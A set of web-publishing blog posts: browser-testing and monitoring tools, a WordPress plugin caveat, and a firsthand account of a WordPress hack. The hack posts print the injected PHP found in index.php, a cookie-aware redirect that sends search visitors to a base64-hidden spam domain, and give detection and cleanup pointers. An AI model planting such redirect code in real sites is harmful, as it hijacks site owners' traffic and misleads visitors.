jammer(six)

Here’s a quick tip for those of you that need to check web layouts on a variety of platforms/browsers…

If you want to check how your pages look in a variety of Windows-based browsers, check out BrowserShots.org. This is a free service that offers screenshots using a wide variety of browsers on multiple platforms.

This is especially useful for Mac users (such as myself) who need to be sure that things look okay when viewed with Internet Explorer. In fact, I’ve been using it quite heavily over the past few days, as I’ve been working on a new layout for my personal finance and parenting sites. While I’ve used Parallels Desktop to check browser compatibility in the past, BrowserShots gives me access to a much wider variety of browsers. And best of all, it also allows me to stop bugging my Windows-based friends for help — thanks Jim and MBH!

Last night I was messing around with sites and I inadvertently crippled my personal finance site. I’ve created a sandbox of sorts , but it wasn’t working properly. I eventually realize that this was because I hadn’t created an .htaccess file for WordPress to store info about redirects. To make a long story short, I fired up my FTP client and copied the file over — or so I thought.

When I awoke this morning, traffic to FiveCentNickel was low and a quick check of my SiteMeter referral logs revealed that I was barely getting any search traffic. I loaded the front page and all appeared to be fine. I was afraid that I had been hacked (again), but was showing no signs of it aside from a lack of search traffic.

I couldn’t figure out what was going on until I tried clicking an internal link. When I did that, I just got an error instead of the article that I had clicked on. When I dug deeper, I realized that this happened because I had moved my .htaccess file instead of copying it. Aaaargh!

The good news is that I did this late on a Sunday evening, and discovered the problem early Monday morning. There wasn’t much too lose during those few hours. And… I’ve learned a valuable lesson.

Apparently the WordPress search redirect hack that I reported on the other day is fairly widespread. Moreover, it’s been taking down sites running WordPress installs as late as ver. 2.5.1, so upgrading won’t necessarily protect you (example).

sidebar: According to Donncha, 2.5.x is not vulnerable to this, but I’ve personally seen a number of 2.5.x sites that are afflicted. One commonality is that many (all?) of these sites are on DreamHost. I wonder if the hackers have somehow compromised DreamHost, and are attacking the 2.5.x installs from the inside (?). Or perhaps they were compromised before upgrading. Just musing — no evidence of that so far. /sidebar

While the nefarious code was, in my case, included in index.php, others are reporting that it may involve a corrupted image file set in the wp_options database table to act as a plugin.

Here are some related articles on the topic: link, link, link

Some DigitalPoint threads: link, link

And some WordPress support threads: link, link

And, finally, video on fixing the problem if you have the plugin version: link

(Thanks to Patrick for the video link.)

It’s still unclear how the affected sites were compromised.

To find out if you’re affected:

Clear cookies, run a Google search for your site, and then click through. If you wind up at your site you’re probably okay. If it redirects to (or through) anyresults.net, then you’ve been hacked. If I were you, I’d try this a couple of times as the cookie that hides the hack seems to stick in some browsers.

Update: Be sure to read the GRS post about getting rid of this thing. I just discovered that I had an extraneous user created at 00:00:00 on 0000-00-00. Unlike JD, however, I haven’t discovered any other database changes — perhaps because I was running an older version of WP (2.3.3) which was easier to take down (?).

After yesterday’s excitement with one of my WordPress installs getting hacked, I though I’d point out this article on securing WordPress. I haven’t read it closely yet, but it looks useful.

Something scary happened today over at FiveCentNickel. Around 3:30 EDT today I noticed that traffic to the site was lagging way behind normal. Upon further investigation, I realized that my search traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.

Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?

Unsure of what else to do, I enlisted the help of Jim, Flexo, and Clever Dude and sent a shout out to all who are following me on Twitter. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up.

My search results were just fine, ruling out the possibility that Google had rolled out new search data that excluded little old me, and it just hadn’t filtered down to our neck of the woods.

And then it happened…

Clever Dude clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this via IM to Jim, he checked it out and saw something similar.

As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it happened to you once, it couldn’t be repeated until you cleared your cookies. Very sneaky.

So where was all of my traffic going?

It was being shunted through www.anyresult.net (no link for you!) and then winding up at an spammy, ad-filled landing page on www.dealtime.com (again, no link for you — I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.

I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.

Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.

Update: All WordPress versions appear to be vulnerable.

Guess what? I just found one.

This is a slick little javascript bookmarklet that lists the attributes of various on-page elements:

Mouseover DOM Inspector

Just save it to your bookmarks toolbar (or wherever). When you want to use it, simply click on it and then mouseover the elements you’re curious about. When you’re done, simply hit escape.

This is a pretty nifty little too for quickly figuring out column widths, etc. when poking around on a site.

Check this out… If you go over to montastic.com you can set up an account and enter any domains that you wish to monitor. You can enter up to 100 domains and, once it’s set up, they’ll periodically ping the sites on your list and e-mail you if there’s a change in status (i.e., site is down, site is back up).

This is a great little set-and-forget tool for alerting you to downtime so you can follow up with your host and get things straightened out. Likewise, if you’re using any affiliate programs, you might want to monitor them to protect against possible outages — this is especially valuable if you’re running pay-per-click campaigns, as downtime = wasted advertising dollars.

The monitoring can be a bit haphazard at times, in that it pings at somewhat random intervals. For example, of the sites that I’m currently tracking, one hasn’t been pinged in four hours whereas all the others have been pinged within the past hour. Regardless, it’s free and easy to use, so you have nothing to lose by setting it up — this is especially true if you use any sort of “budget” web host.

This is a quick note to WordPress users our there… I have always felt that you should never rely on a plugin to do something that can just as easily be done by hand, especially when it comes to content creation.

Now I have an example to back this up:

wp-table

This is a slick little plugin that creates fancy html tables. The problem, as stated at the top of the download page, is that:

This plugin do not support WordPress 2.5. Currently I don’t plan a new version…

This means that anyone that has relied on this plugin in the past has a choice to make:

(1) Don’t upgrade beyond WordPress 2.3.X
(2) Upgrade, stop using the plugin, and lose all of your tables
(3) Go back and hand-code your tables before upgrading

Fortunately for me, I only played around with this plugin briefly, and had only one table to fix. But if you had relied heavily on this plugin, you’d be in a pretty tough spot right now.

While plugins can a great tool, it’s important to remember that you’re dependent on the developer to maintain compatibility going forward. Thus, when it comes to content creation, you’re better off biting the bullet and future-proofing your articles from the very beginning rather than relying on third-party add-ons.